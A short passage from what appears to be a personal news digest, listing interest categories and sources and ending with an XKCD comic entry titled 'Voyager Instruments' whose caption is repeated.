  7. General interests: gardening, woodwork, cycling, fitness, travel
  8. Comics

Sources: Breaking News Ireland, Wexford Local, Hacker News, r/gaming, r/pcgaming, r/antiAI, r/indiegaming, Lenny's Newsletter, One Useful Thing, Newcomer, Simon Willison

Comics

Voyager Instruments

XKCD · view →
Convincing him to turn off the stupid laser show and useless sound system was such a huge ordeal that no one has wanted to do it again.

Convincing him to turn off the stupid laser show and useless sound system was such a huge ordeal that no one has wanted to do it again.